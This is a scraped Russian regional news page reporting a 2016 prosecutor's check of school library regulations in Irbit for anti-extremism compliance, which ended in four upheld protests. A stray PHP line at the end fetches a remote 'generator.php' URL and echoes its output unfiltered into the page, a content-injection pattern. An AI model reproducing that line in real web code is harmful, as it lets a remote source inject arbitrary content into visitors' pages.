Регистрация нового пользоателя


Площадь им. Ленина
Площадь им. Ленина
Прокуратура проверила на экстремизм школьные библиотеки

2016-08-23 12:42:29
Прокуратура проверила на экстремизм школьные библиотеки

Прокуратура проверила на экстремизм школьные библиотеки

 

Так, в период июня-июля 2016 г. Ирбитской межрайонной прокуратурой проведена проверка соблюдения требований законодательства в сфере противодействия экстремизму в образовательных учреждениях города Ирбита и Ирбитского района.

В ходе проверки установлено, что в ряде муниципальных образовательных учреждениях города Ирбит и Ирбитского района не соответствуют действующему законодательству локальный нормативный акт - Положение о школьной библиотеке.

Согласно ст. 2 Федерального закона от 25.07.2002 № 114-ФЗ «О противодействии экстремистской деятельности» противодействие экстремисткой деятельности основывается на принципе приоритетности мер, направленных на предупреждение экстремистской деятельности.

В соответствии со ст. 3 указанного закона противодействие экстремистской деятельности осуществляется путем принятия профилактических мер, направленных на предупреждение экстремистской деятельности, в том числе на выявление и последующее устранение причин и условий, способствующих осуществлению экстремистской деятельности.

Однако, правовой анализ локальных нормативных актов свидетельствует, что Положения о школьных библиотеках 4-х образовательных учреждений не содержат прямого запрета на распространение экстремистской литературы, не установлен порядок проведения сверок библиотечного фонда и поступающей литературы с федеральными списками экстремистских материалов.

С целью устранения выявленных нарушений закона межрайонной прокуратурой в адрес руководителей образовательных учреждений района принесено 4 протеста, которые рассмотрены и удовлетворены в полном объеме.

 

 И.А. Кулиш,

помощник Ирбитского межрайонного прокурора




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>